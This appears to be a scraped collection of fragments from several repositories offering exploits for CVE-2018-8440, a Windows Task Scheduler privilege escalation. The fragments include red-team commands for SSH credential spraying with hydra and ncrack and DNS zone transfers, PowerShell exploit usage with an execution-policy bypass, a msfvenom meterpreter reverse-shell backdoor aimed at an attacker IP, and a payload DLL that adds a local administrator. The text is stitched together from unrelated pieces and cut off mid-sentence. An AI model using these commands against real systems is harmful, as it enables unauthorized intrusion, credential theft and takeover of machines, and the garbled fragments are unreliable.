CVE-2018-8440

RedTeam-CheatSheet SSH - 22 Tunneling ssh -L 8443:127001:8443 user@xxxx Credentials Spraying ncrack -U userstxt -P passtxt ssh://xxxx hydra -L /Usernamestxt -P Passwordstxt ssh://xxxx DNS - 53 Perform DNS Zone Transfer check dig axfr xx

A PowerShell example of the Windows zero day priv esc

Usage Set-ExecutionPolicy Bypass Process \exploitps1 -TargetFile C:\Windows\Somedll This will exploit the Windows operating system allowing you to modify the file Somedll Example Set-ExecutionPolicy Bypass Process \exampleps1 youtube/rNSpxJd3_BM Finding Vulnerable DLL files $aapsid =

CVE-2018-8440 standalone exploit

CVE-2018-8440 Since I noticed that metasploit is using the dll lib provided by SandboxEscaper and only has a target for x64, I decided to share my poc to the community Of course there are much better vectors than targeting the print spooler, but I'll leave that as an exercise for the reader This is a standalone poc executable that was tested on x86 (I needed it for a cli

Metasploit-Note CVE-2018-8440 Attacker IP : 19216811 Victim IP : 19216812 Victim OS : Windows 10x64 Step 1 產生後門程式 $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=19216811 LPORT=4444 -f exe > backdoorexe Step 2 監聽回傳設定 $ msfconsole msf > use m

Task Scheduler LPE from SandboxEscaper

All credit goes to SandboxEscaper Added a payloaddll (exploitdll in the project) that adds local admin using WinExec This won't crash spoolsvexe unlike msf and cobalt payloads, probably because these don't return true or exit on process which terminates spools I have not updated the SLN file to account for renamed payload files or directories You probably need t